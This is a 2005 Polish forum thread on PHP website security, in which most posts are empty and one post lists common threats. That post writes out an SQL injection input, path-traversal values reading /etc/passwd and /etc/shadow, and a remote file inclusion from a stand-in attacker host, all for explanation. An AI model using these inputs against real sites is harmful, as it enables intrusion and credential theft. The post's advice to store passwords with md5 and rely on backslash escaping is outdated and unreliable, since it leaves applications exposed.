Strona 1 z 1

Bezpieczeństwo

PostNapisane: 16 lipca 2005, o 12:33
przez DEXTER:)

Bezpieczeństwo

PostNapisane: 16 lipca 2005, o 12:35
przez januzi

Bezpieczeństwo

PostNapisane: 16 lipca 2005, o 12:58
przez DEXTER:)

Bezpieczeństwo

PostNapisane: 16 lipca 2005, o 13:07
przez januzi
4) 5) jak masz cos dzialajce na bazie, np. pobierasz tekst o numerze pobranym z adresu "select * from tabela where numer = $numer" ;
zgadnij co sie stanie, jesli zamiast liczby pojawi sie tam tekst jakis ? np "1 ; drop all" ? tam gdzie sie da nalezy (int)$zmienna, a tam gdzie nie, to trzeba przypilnowac zeby nie pojawily sie wpisy umozliwiajace dowolna operacje na bazie (dodawanie \ przed " i ' jest dosc skuteczne, zeby sie zabezpieczyc)

3) include ( $zmienna ) ; $zmienna = "../../../etc/passwd" ; $zmienna = "../../../etc/shadow" ; $zmienna = "http://bandzior/skrypt_na_serwerze_bez_php.php" ;

2) md5(), logowanie sie zachowywane tez w md5() np. jako zlozenie hasla+nick+costam

1) kontrola odbieranych plikow przed przeniesieniem do katalogu, kontrola obslugi formularza, tak aby nie mozna bylo go wywolac bezposrednio, kontrola wyslanych danych pod katem tego skad przyszly
teksty mozna znalezc na php.pl, kess.snug.pl ...

PostNapisane: 26 września 2005, o 08:50
przez kalu111
co to znaczy : " kontrola obslugi formularza, tak aby nie mozna bylo go wywolac bezposrednio(..)" :?:

PostNapisane: 26 września 2005, o 10:02
przez januzi

PostNapisane: 26 września 2005, o 13:33
przez kalu111

PostNapisane: 26 września 2005, o 15:40
przez januzi

PostNapisane: 27 września 2005, o 08:22
przez kalu111